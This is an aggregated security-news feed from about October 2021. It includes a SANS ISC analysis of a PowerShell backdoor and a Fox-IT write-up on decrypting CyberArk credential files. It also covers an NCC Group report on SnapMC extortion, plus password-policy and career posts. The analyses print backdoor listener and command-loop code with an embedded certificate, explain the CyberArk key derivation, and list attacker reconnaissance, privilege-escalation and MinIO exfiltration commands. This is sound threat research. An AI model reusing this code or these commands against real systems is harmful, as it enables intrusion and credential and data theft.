Security Posts

Infocon: green

Malicious PowerShell Using Client Certificate Authentication
Categories: Security Posts

Massive Phishing Campaign Domain Farm Spotted in the Wild Uses Google's Firebase Thousands of Users Affected - An OSINT Analysis

I've just stumbled across a pretty decent and massive phishing domains farm that using Google's for the purpose of hosting and distributing the rogue and malicious content.In this post I'll provide actionable intelligence on the infrastructure behind it including to discuss in-depth the TTPs (Tactics Techniques and Procedures) of the cybercriminals behind it.Sample rogue and malicious URL known
Categories: Security Posts

Sinclair Confirms Ransomware Attack That Disrupted TV Stations

Threatpost - 38 min 54 sec ago
A major cyberattack resulted in data being stolen, too, but Sinclair's not sure which information is now in the hands of the crooks.
Categories: Security Posts

Vulnerability Spotlight: Multiple vulnerabilities in ZTE MF971R LTE router

Cisco Talos - 1 hour 51 min ago
Marcin “Icewall” Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.  Cisco Talos recently discovered multiple vulnerabilities in the ZTE MF971R LTE portable router.  The MF971R is a portable router with Wi-Fi support and works as an LTE/GSM modem. An attacker could...

[[ This is only the beginning! Please visit the blog for the complete entry ]]
Categories: Security Posts

TikTok Serves Up Fresh Gamer Targets via Fake Among Us, Steam Offerings

Threatpost - 2 hours 31 min ago
The tween-friendly video app is being used to serve up malvertising, disguised as free Steam game accounts or Among Us game hacks.
Categories: Security Posts

Twitter Suspends Accounts Used to Snare Security Researchers

Threatpost - 4 hours 32 min ago
The accounts were used to catfish security researchers into downloading malware in a long-running cyber-espionage campaign attributed to North Korea.
Categories: Security Posts

BlackByte ransomware decryptor released

Zero Day | ZDNet RSS Feed - 9 hours 12 min ago
The "odd" malware avoids systems based on Russian and ex-USSR languages.
Categories: Security Posts

Cybersecurity Awareness Month: Building your career

Naked Security Sophos - 9 hours 31 min ago
Explore. Experience. Share. How to get into cybersecurity...
Categories: Security Posts

How to Switch From Google Authenticator to Another 2FA App

Wired: Security - 9 hours 55 min ago
Yes, you can choose another two-factor authentication app without getting locked out of your accounts.
Categories: Security Posts

Malicious PowerShell Using Client Certificate Authentication, (Mon, Oct 18th)

Attackers have many ways to protect their C2 servers from unwanted connections. They can check some specific headers, the user-agent, the IP address location (GeoIP), etc. I spotted an interesting PowerShell sample that implements a client certificate authentication mechanism to access its C2 server. It's VT score is 9/56[1] (SHA256:6d3f45db0a991572a7ac8077e2fd8eec29aad99e7efa6cea5e54186ac1abc488). The certification is Base64 encoded and protected by the password 'password' (no comment): $ztgMbBRW99 = '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 =' $QneQGddx99 = 'password' The implementation is done via System.Security.Cryptography.X509Certificates.X509Certificate2: $uSrbSrVp99 = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2([System.Convert]::FromBase64String($ztgMbBRW99), $QneQGddx99) $UAEeAVGa99 = [System.Net.Sockets.TcpListener][int]$port $UAEeAVGa99.start() $dGIDFjCR99 = $UAEeAVGa99.AcceptTcpClient() $pIPCBjOz99 = New-Object System.Net.Security.SslStream $dGIDFjCR99.GetStream(), $false, ({$True} -as [Net.Security.RemoteCertificateValidationCallback]) $pIPCBjOz99.AuthenticateAsServer($uSrbSrVp99, $false, [System.Security.Authentication.SslProtocols]::Tls, $false) The class x509Certificate2 expects a certificate in PFX or PKCS12 format. Let's try to decode the one present in the script using OpenSSL: $ openssl pkcs12 -in payload.cert Enter Import Password: MAC verified OK Bag Attributes     localKeyID: FB 69 28 8A 7B F7 EB C0 B7 7A EC AE 0A 17 64 A0 A4 17 94 9E subject=/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com issuer=/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com -----BEGIN CERTIFICATE----- MIIDNDCCAhwCCQCW9ShBEcQuFTANBgkqhkiG9w0BAQsFADBcMQswCQYDVQQGEwJV UzEPMA0GA1UECAwGRGVuaWFsMRQwEgYDVQQHDAtTcHJpbmdmaWVsZDEMMAoGA1UE CgwDRGlzMRgwFgYDVQQDDA93d3cuZXhhbXBsZS5jb20wHhcNMTYwODAyMDczODM3 WhcNMTcwODAyMDczODM3WjBcMQswCQYDVQQGEwJVUzEPMA0GA1UECAwGRGVuaWFs MRQwEgYDVQQHDAtTcHJpbmdmaWVsZDEMMAoGA1UECgwDRGlzMRgwFgYDVQQDDA93 d3cuZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDJ c9dMuojBRCSFR3sRofKng2l9jScY/FqdNbkFJcelsa9qqef3LSuCRA082ObKf3sZ OQZgrUocPN0uiV3T14cZjJwFMQDKfWf7hMEV2jFeQQs7bqTEdAPY2D3rtOQXo2w8 JXamXBqXuVP0UnSvhftetHzAfbQ5VZQoH4hmthbFJXehsgNIQpvCW7VFU6+a2npQ 33vVEv0AiGxxXCcJRwKsc2hvg49rPhWETChFr5FhLOS5BIjag5jcLG5BCROYR6wk NsvWvhQd3lnz3Al4tdvUKoCgls+tT467TfGH2mBm3vZpDzOt0GT8qF0tmSERZbsc czBfTfjmikOtnYw7VKTtAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAJX83wuyTekt dUA3C2iucf2PkzlUYhG9xTyoF9hJmI+e9U4NW+Xc8RuRTStiBegRkjCRaTC/A4KC UaeafFzdiEy9QNkU6VFA9ASyQvIqkxoCUHPTfD0gymUtElDjM5yeeBgCO4Jb1oLV 2cGpGR6vgZ/1VcEjR7VpyGuhafFTZQJax0zuKcinh3aKlDYEBg/FUAM6e2sQYPae PElSefgqariBUB6MJbjJQacCKmyHCw3+JHtM+1vdRhBuhwAbrqnfoWtDNik8ZG3T 9o7Eu+/II7noRQFKYOB/OszM2eVxSg6xpoguuHU1HMmm5MmFhziAKbyUy0XJhOVm eXfyG6jQE5I= -----END CERTIFICATE----- Once the connection is established, the script enters an infinite loop and waits for commands. Data is delivered via JSON objects: try { $type = ($veAsxeZF99 | ConvertFrom-Json).type $zxrTrFRw99 = ($veAsxeZF99 | ConvertFrom-Json).data $EBZtfXQJ99 = ($veAsxeZF99 | ConvertFrom-Json).sendoutput $ucyYeLLE99 = ($veAsxeZF99 | ConvertFrom-Json).multiple $data = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($zxrTrFRw99)) $extra = ($veAsxeZF99 | ConvertFrom-Json).extra } catch { continue } The received payload in $data is executed and the output is sent back to the C2. The fact that the certificate is stored in the script makes the debugging easy but this technique can indeed defeat simple scanners or automated checks! [1] https://www.virustotal.com/gui/file/6d3f45db0a991572a7ac8077e2fd8eec29aad99e7efa6cea5e54186ac1abc488
[2] https://docs.microsoft.com/en-us/dotnet/api/system.security.cryptography.x509certificates.x509certificate2?view=net-5.0 Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Hands-on domain password policy setup for Active Directory

AlienVault Blogs - 10 hours 55 min ago
This blog was written by an independent guest blogger. Dealing with the massive architecture of client-server networks requires effective security measures. Everyone has become painfully aware of all dangerous fishes roaming around the pool of the network, trying to get access to the system. Having a weak password policy is a key vector for attackers to gain system access. However, admins can help protect password security of the wide-reaching network using Group Management Policy (GPO). Let's get rolling about how we can configure Domain Password Policy for Active Directory. But what's domain password policy? To harden the client's passwords, Active Directory (AD) has a feature of default domain password policy. The policy says:
  • Use encryption for passwords.
  • Use long character passwords.
  • Expire passwords after some time, and so on.
This policy helps to mitigate password attacks like brute force by pairing with several other policies like lockout policy. Configure domain password policy Password policies come under the group policy, which relates to the root domain. Follow these steps to configure the domain password policy.
  • Run the 'gpmc.msc' command to open the Group Policy Management console in the Windows Server.
  • Expand the window's left pane.
Group Policy Management -> Domains -> Group Policy Objects -> Default Domain Policy.
  • Open the Group Policy Management Editor by right-clicking on the Default Domain Policy and select edit.
  • A new window will pop up. Navigate to the Password Policy node from the left pane to see the policies on the right-side pane.
Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Account Policies -> Password Policy
  • Double-click any password policy you want to modify from the list.
  • I am selecting a Minimum Password Length policy.
Change the value -> Apply setting -> Click Ok. View domain password policy through PowerShell
  • Search the PowerShell from the start -> Run it with admin rights.
  • Enter the command -> Get-ADDefaultDomainPasswordPolicy
Guidelines for creating a password policy The password policy must ensure that user account passwords are sufficiently unique, strong, and reset promptly. Several compliance regulations, such as PCI-DSS, HIPAA, SOX, NIST, and more, have set password policy standards. The Password Policy Microsoft recommends is:
  • Enforce Password History with a value of 24. It will help reduce the risks associated with password reuse.
  • Based on the situation, set the Maximum Password Age to 30 to 90 days. A hacker will only have a short period to break a user's password and get admin rights to network services.
  • We should set the Minimum Password Age to one day, as per Windows security baselines. When the duration is 0, you can change your password right away. That's not a good option to use.
  • Set the Minimum Password Length to at least eight characters. An eight-character password is suggested for most situations as it's strong enough to offer protection while remaining concise for people to memorize.
  • Enable Password Must Meet Complexity setting. This policy option, paired with an 8-character minimum password length, guarantees that a unique password has at least 218,340,105,584,896 distinct combinations. A brute force attack is challenging, but not unattainable, with this option.
  • Disable Store Passwords Using Reversible Encryption. Enable it if you utilize CHAP through remote access or IAS or Digest Authentication in IIS.
It's a good practice to adopt the Windows recommendations, but you may also utilize options other than the Domain Password Policy.
  • Passwords and lockout policies go together. The lockout policy prohibits hackers from employing brute-force attacks or dictionaries to acquire full rights to the network. If the hacker gets the username, he can attempt several password combos. The lockout will keep the amount of failed login tries to a minimum.
  • If a user's password is about to expire, email notifications can act as a reminder. Users can receive email prompts when it's due to update their passwords before they expire.
  • Admins should perform password audits periodically to prevent attacks from massive password dictionaries.
In a nutshell Within a domain structure, users are the easy targets. The account login and password may be the only security precautions in place to secure their devices. Although the username may be simple to predict, we must not tolerate weak passwords.   Inside an AD domain, the Default Password Policy prevents users from setting simple passwords. However, you may want to change this password policy in rare situations because of restrictions or the usage of apps. Always follow best practices when changing the password policy options.
Categories: Security Posts

Qué destrezas debe tener un técnico para ser buen CTO y no cumplir el Principio de Peter #HackYourCareer

Un informático en el lado del mal - 10 hours 57 min ago
Cuando comencé con 24 años la andadura de dirigir Informática 64 era una persona 100% Hands-On. Necesitaba hacerlo todo por mí mismo. Las tareas que caían en mi lado las hacía siempre yo a mi manera y modo, esforzándome por aprender a hacerlas mejor. Sin embargo, con el paso del tiempo tuve que aprender a hacer otras tareas que no había aprendido en la universidad. A gestionar equipos.
Figura 1: Qué destrezas debe tener un técnico para ser buen CTOy no cumplir el Principio de Peter #HackYourCareer
Gestionar un equipo de personas es una tarea compleja. Y no hay una única forma de hacerlo, claro que no. Durante los últimos 22 años dirigiendo equipos de profesionales para objetivos muy diversos, he tenido que aprender mucho y variado de cómo hacerlo. 
Hoy, con la experiencia de los años, sé que cuando alguien pone en el CV "capacidad de dirigir equipos", no siempre entiendo por ello lo mismo que los demás, pues gestionar un equipo comercial, un equipo de gestión, y un equipo técnico es una cosa muy diferente entre sí. Y gestionar todos los equipos para que funcionen acompasados como una orquesta, es la labor de un COO o un CEO, que se aprende cuando has gestionado una P&L - a ser posible que afecte a tu bolsillo - y todas las decisiones para que se cumpla el Business Plan. Entre ellas, por supuesto, las que tienen que ver con tecnología.
El CTO y el Principio de Peter
Centrándome ya en el mundo de la tecnología, hay una máxima que se aplica muchas veces en estas organizaciones, y es el famoso Principio de Peter. O lo que es lo mismo, que un buen desarrollador, un buen Arquitecto de Software, un buen Administrador IT se convierte en un pésimo CTO cuando es promocionado. Simplemente porque no ha aprendido a algo de lo que yo siempre hablo con mis amigos técnicos:
- "Tienes que aprender a pintar con las manos de otros. Tienes que aprender a hacer tecnología con las manos de tus desarrolladores." 
Siempre uso la metáfora de los grandes artistas, pintores, escultores, etcétera que tienen un taller con jóvenes pintores, o escultores que trabajan bien los materiales, o simplemente ayudantes, que preparan los trabajos y ejecutan las ideas de los artistas. Es labor del artista crear la obra, pero cuenta con un gran número de trabajadores que pintan en sus cuadros, que trabajan en sus ideas, en sus obras. Son ayudantes de plasmar y ejecutar la visión del artista.
Figura 2: Entrevista con Marc Oliveras, Head of Bumble Barcelona
El genial artista Okuda, famoso por sus obras a través de todo el mundo, cuenta con un taller en el que otros pintores, ayudantes, trabajadores del diseño 3D están para ayudarle a crear la obra que él ha visto en su cabeza, que el ha plasmado en sus bocetos, en sus diseños. Él crea la obra con la ayuda de las manos de los demás.
Este es el trabajo de un C-Level. Ser capaz de hacer un trabajo que será su propia responsabilidad con las manos de las personas de sus equipos. Y esto, en el caso del CTO, donde la gran mayoría de CTOs han sido grandes desarrolladores, arquitectos de software o administradores de sistemas, es el gran reto. Dejar de ser 100% hands-on a ser capaz de crear tecnología con las manos de sus equipos. Y no siempre lo consiguen.
Nuevas destrezas
Cuando hay que gestionar un equipo técnico para que suene como una orquesta hay que desarrollar nuevas capacidades. No todas las personas son iguales, ni tienen las mismas motivaciones, ni funcionan por las mismas motivaciones. Las habilidades sociales, personales, la gestión del talento es una necesidad fundamental para saber acoplar las piezas, pero también hace falta disciplina y método para tocar la partitura.
Figura 3: Entrevista a Fernando Díaz, CTO de Mercadona Tech
Un CTO debe saber gestionar una organización, creando procesos, metodologías, rutinas y hábitos que ayuden a la construcción de un equipo que sepa lidiar con las situaciones de contexto externas, los problemas y vicisitudes del día a día. Y también hay que elegir qué instrumentos son los que se van a utilizar para que todos trabajen de forma coordinada.
Es decir, un gran Arquitecto de Software no tiene obligatoriamente que ser un buen CTO, y es necesario aprender habilidades para cumplir correctamente esa función. Establecer la metodología de trabajo, preocupándose de la calidad y seguridad del software, alineado con los tiempos y recursos de la corporación, gestionar el talento, elegir el "stack" tecnológico y definir los mecanismos de control es un trabajo de un buen CTO
BootCamp Online de Tech Management &  Leadership
Yo he tenido la suerte de trabajar con grandes CTOs en mis equipos, y siempre ha sido necesario establecer todo este trabajo al principio y cuidarlo día a día. Por eso si quieres dar el salto a ser un CTO, necesitas cumplir esas disciplinas. 
Figura 4: BootCamp Online Tech Management & Leadership
Yo soy un Doctor en Informática que ha estudiado todo lo que tiene que ver con tecnología, y me ha tocado ser C-Level en empresas tecnológicas desde muy joven. Toda mi carrera profesional. He tenido que aprender a pintar con las manos de otros, al mismo tiempo que entendía la tecnología que teníamos entre manos, para crear cosas que parecían imposibles.
Figura 5: Primera parte del temario delBootCamp Online de Tech Management & Leadership
Por eso, cuando hablamos con los compañeros de GeeksHubs Academy para hacer que la carrera de los profesionales creciera, tenía claro que hay que formar a gente de tecnología para que sea C-Level, para que gobiernen los equipos entendiendo la tecnología. Y por eso está el BootCamp Online de Tech Management & LeaderShip, porque, repito, ser un CTO no es ser el que más saber de una determinada tecnología, sino el que sabe cómo hacer tecnología con las manos de muchos ingenieros.
Figura 6: Segunda parte del temario delBootCamp Online de Tech Management & Leadership
Y hasta que no aprendas esto, no serás capaz de subir al nivel C. Al nivel de "Chief". Para ello, necesitas aprender que hacer esto no significa "mandar que se haga", sino saber que se trata de que sepas "gestionar el equipo para que pase", que es distinto.
¡Saludos Malignos!
Autor: Chema Alonso (Contactar con Chema Alonso)  


Sigue Un informático en el lado del mal RSS 0xWord
- Contacta con Chema Alonso en MyPublicInbox.com
Categories: Security Posts

ISC Stormcast For Monday, October 18th, 2021 https://isc.sans.edu/podcastdetail.html?id=7716, (Mon, Oct 18th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Reverse engineering and decrypting CyberArk vault credential files

Fox-IT - Tue, 2021/10/12 - 09:42
Author: Jelle Vergeer This blog will be a technical deep-dive into CyberArk credential files and how the credentials stored in these files are encrypted and decrypted. I discovered it was possible to reverse engineer the encryption and key generation algorithms and decrypt the encrypted vault password. I also provide a python implementation to decrypt the contents of the files. Introduction It was a bit more than a year ago that we did a penetration test for a customer where we came across CyberArk. During the penetration test we tested the implementation of their AD tiering model and they used CyberArk to implement this. During the penetration test we were able to get access to the CyberArk Privileged Session Manager (PSM) server. We found several .cred CyberArk related files on this server. At the time of the assignment I suspected the files were related to accessing the CyberArk Vault. This component stores all passwords used by CyberArk. The software seemed to be able to access the vault using the files with no additional user input necessary. These credential files contain several fields, including an encrypted password and an “AdditionalInformation” field. I immediately suspected I could reverse or break the crypto to recover the password, though the binaries were quite large and complex (C++ classes everywhere). A few months later during another assignment for another customer we again found CyberArk related credential files, but again, nobody knew how to decrypt them. So during a boring COVID stay-at-home holiday I dove into the CreateCredFile.exe binary, used to create new credential files, and started reverse engineering the logic. Creating a dummy credential file using the CreateCredFile utility looks like to following: Creating a new credential file with CreateCredFile.exe The created test.cred credential file The encryption and key generation algorithms It appears there are several types of credential files (Password, Token, PKI, Proxy and KeyPair). For this exercise we will look at the password type. The details in the file can be encrypted using several algorithms:
  • DPAPI protected machine storage
  • DPAPI protected user storage
  • Custom
The default seemed to be the custom one, and after some effort I started to understand the logic how the software encrypts and decrypts the password in the file. The encryption algorithm is roughly the following: First the software generates 20 random bytes and converts this to a hexadecimal string. This string is stored in the internal CCAGCredFile object for later use. This basically is the “AdditionalInformation” field in the credential files. When the software actually enters the routine to encrypt the password, it will generate a string that will be used to generate the final AES key. I will refer to this string as the base key. This string will consist of the following parts, appended together:
  • The Application Type restriction, converted to lower case, hashed with SHA1 and base64 encoded.
  • The Executable Path restriction, converted to lower case.
  • The Machine IP restriction.
  • The Machine Hostname restriction, converted to lower case.
  • The OS Username restriction, converted to lower case.
  • The 20 random bytes, or AdditionalInformation field.
An example base string that will be used to generate the AES key Note that by default, the software will not apply the additional restrictions, only relying on the additional info field, present in the credential files. After the base key is generated, the software will generate the actual encryption key used for encrypting and decrypting credentials in the credential files. It will start by creating a SHA1 context, and update the context with the base key. Next it will create two copies of the context. The first context is updated with the integer ‘1’, and the second is updated with the integer ‘2’, both in big endian format. The finalized digest of the first context serves as the first part of the key, appended by the first 12 bytes of the finalized second digest. The AES key is thus 32 bytes long. When encrypting a value, the software generates some random bytes to use as initialization vector (IV) , and stores the IV in the first block of encrypted bytes. Furthermore, when a value is encrypted, the software will encrypt the value itself, combined with the hash of the value. I assume this is done to verify the decryption routine was successful and the data is not corrupted. Decrypting credential files Because, by default, the software will only rely on the random bytes as base key, which are included in the credential file, we can generate the correct AES key to decrypt the encrypted contents in the file. I implemented a Python utility to decrypt CyberArk Credential files and it can be downloaded here. The additional verification attributes the software can use to include in the base key can be provided as command line arguments to the decryption tool. Most of these can be either guessed, or easily discovered, as an attacker will most likely already have a foothold in the network, so a hostname or IP address is easily uncovered. In some cases the software even stores these verification attributes in the file as it asks to include the restrictions in the credential file when creating one using the CreateCredFile.exe utility. Decrypting a credential file using the decryption tool. Defense How to defend against attackers from decrypting the CyberArk vault password in these credential files? First off, prevent an attacker from gaining access to the credential files in the first place. Protect your credential files and don’t leave them accessible by users or systems that don’t need access to them. Second, when creating credential files using the CreateCredFile utility, prefer the “Use Operating System Protected Storage for credentials file secret” option to protect the credentials with an additional (DPAPI) encryption layer. If this encryption is applied, an attacker will need access to the system on which the credential file was generated in order to decrypt the credential file. Responsible Disclosure We reported this issue at CyberArk and they released a new version mitigating the decryption of the credential file by changing the crypto implementation and making the DPAPI option the default. We did not have access to the new version to verify these changes. Timeline: 20-06-2021 – Reported issue at CyberArk.
21/23/27/28-06-2021 – Communication back and forth with questions and explanation.
29-06-2021 – Call with CyberArk. They released a new version which should mitigate the issue.
Categories: Security Posts

SnapMC skips ransomware, steals data

Fox-IT - Mon, 2021/10/11 - 21:15
Over the past few months NCC Group has observed an increasing number of data breach extortion cases, where the attacker steals data and threatens to publish said data online if the victim decides not to pay. Given the current threat landscape, most notable is the absence of ransomware or any technical attempt at disrupting the victim’s operations. Within the data breach extortion investigations, we have identified a cluster of activities defining a relatively constant modus operandi described in this article. We track this adversary as SnapMC and have not yet been able to link it to any known threat actors. The name SnapMC is derived from the actor’s rapid attacks, generally completed in under 30 minutes, and the exfiltration tool mc.exe it uses. Extortion emails threatening their recipients have become a trend over time. The lion’s share of these consists of empty threats sent by perpetrators hoping to profit easily without investing in an actual attack. In the extortion emails we have seen from SnapMC have given victims 24 hours to get in contact and 72 hours to negotiate. These deadlines are rarely abided by since we have seen the attacker to start increasing the pressure well before countdown hits zero. SnapMC includes a list of the stolen data as evidence that they have had access to the victim’s infrastructure. If the organization does not respond or negotiate within the given timeframe, the actor threatens to (or immediately does) publish the stolen data and informs the victim’s customers and various media outlets. Modus Operandi Initial Access At the time of writing NCC Group’s Security Operations Centers (SOCs) have seen SnapMC scanning for multiple vulnerabilities in both webserver applications and VPN solutions. We have observed this actor successfully exploiting and stealing data from servers that were vulnerable to:
  • Remote code execution in Telerik UI for ASPX.NET [1]
  • SQL injections
After successfully exploiting a webserver application, the actor executes a payload to gain remote access through a reverse shell. Based on the observed payloads and characteristics the actor appears to use a publicly available Proof-of-Concept Telerik Exploit [2]. Directly afterwards PowerShell is started to perform some standard reconnaissance activity:
  • whoami
  • whoami /priv
  • wmic logicaldisk get caption,description,providername
  • net users /priv
Note: that in the last command the adversary used the ‘/priv’ option, which is not a valid option for the net users command. Privilege Escalation In most of the cases we analyzed the threat actor did not perform privilege escalation. However in one case we did observe SnapMC trying to escalate privileges by running a handful of PowerShell scripts:
  • Invoke-Nightmare [3]
  • Invoke-JuicyPotato [4]
  • Invoke-ServiceAbuse [4]
  • Invoke-EventVwrBypass [6]
  • Invoke-PrivescAudit [7]
Collection & Exfiltration We observed the actor preparing for exfiltration by retrieving various tools to support data collection, such as 7zip and Invoke-SQLcmd scripts. Those, and artifacts related to the execution or usage of these tools, were stored in the following folders:
  • C:\Windows\Temp\
  • C:\Windows\Temp\Azure
  • C:\Windows\Temp\Vmware
SnapMC used the Invoke-SQLcmd PowerShell script to communicate with the SQL database and export data. The actor stored the exported data locally in CSV files and compressed those files with the 7zip archive utility. The actor used the MinIO [8] client to exfiltrate the data. Using the PowerShell commandline, the actor configured the exfil location and key to use, which were stored in a config.json file. During the exfiltration, MinIO creates a temporary file in the working directory with the file extension […].par.minio. C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure alias set <DIR> <EXFIL_LOCATION> <API key> <API SECRET> C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure cp --recursive [DIR NAME] <CONFIGURED DIRECTORY>/<REMOTE DIRECTORY>/<VICTIM DIRECTORY> Mitigations First, initial access was generally achieved through known vulnerabilities, for which patches exist. Patching in a timely manner and keeping (internet connected) devices up-to-date is the most effective way to prevent falling victim to these types attacks. Make sure to identify where vulnerable software resides within your network by (regularly performing) vulnerability scanning. Furthermore, third parties supplying software packages can make use of the vulnerable software as a component as well, leaving the vulnerability outside of your direct reach. Therefore, it is important to have an unambiguous mutual understanding and clearly defined agreements between your organization, and the software supplier about patch management and retention policies. The latter also applies to a possible obligation to have your supplier provide you with your systems for forensic and root cause analysis in case of an incident. Worth mentioning, when reference testing the exploitability of specific versions of Telerik it became clear that when the software component resided behind a well configured Web Application Firewall (WAF), the exploit would be unsuccessful. Finally, having properly implemented detection and incident response mechanisms and processes seriously increases the chance of successfully mitigating severe impact on your organization. Timely detection, and efficient response will reduce the damage even before it materializes. Conclusion NCC Group’s Threat Intelligence team predicts that data breach extortion attacks will increase over time, as it takes less time, and even less technical in-depth knowledge or skill in comparison to a full-blown ransomware attack. In a ransomware attack, the adversary needs to achieve persistence and become domain administrator before stealing data and deploying ransomware. While in the data breach extortion attacks, most of the activity could even be automated and takes less time while still having a significant impact. Therefore, making sure you are able to detect such attacks in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization. MITRE ATT&CK mapping TacticTechniqueProcedureReconnaissanceT1595.002 – Vulnerability scanningSnapMC used the Acunetix 